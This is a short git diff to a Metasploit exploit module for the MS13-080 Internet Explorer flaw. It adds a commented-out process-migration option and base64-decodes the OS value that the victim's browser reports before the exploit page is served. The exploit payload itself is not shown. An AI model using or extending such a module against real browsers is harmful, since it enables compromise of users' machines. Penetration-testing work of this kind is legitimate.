diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index cdbd765418..0447278a3b 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { + #'PrependMigrate' => true, 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, @@ -88,6 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def get_check_html %Q| @@ -280,7 +282,12 @@ function kaiju() { def on_request_uri(cli, request) if request.uri =~ /search\?o=(.+)\&d=(.+)$/ - target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) } + target_info = + { + :os => Rex::Text.decode_base64(Rex::Text.uri_decode($1)), + :dll => Rex::Text.uri_decode($2) + } + sploit = get_sploit_html(target_info) send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) return